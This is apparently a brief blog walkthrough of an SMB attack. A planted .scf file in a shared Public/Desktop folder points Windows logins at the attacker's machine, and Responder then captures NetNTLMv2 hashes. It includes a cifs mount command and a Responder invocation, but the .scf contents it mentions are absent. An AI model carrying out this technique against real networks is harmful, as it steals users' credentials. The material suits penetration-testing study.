SMB - SCF File Attacks (NetNTLMv2 hash grab)

SMB - SCF (Shell Command Files) -  File Attacks (NetNTLMv2 hash(challenge) grab)


Create a file steal_hash.scf with the above in it. Add the correct Attackers IP address

Next upload the file into the Desktop within the Public Folders.
The Public/Desktop folder is accessed every time any users logs in.
Therefore when the user logs in, the icon is requested from our attackers box,
a challenge request is requested by the attacker, a challenger response is then
returned to use with the NetNTLMv2.

Upload the file like so...

mount -t cifs '// shares' -o username=amanda /mnt

If we have a readable and mountable SMB share with Public, then we can add this by
combining the two attacks together.


Next start Responder - only very basic settings needed.

responder -I tun0

And now wait for a user to log in and we should see the NetNTLMv2 :-)

1 comment: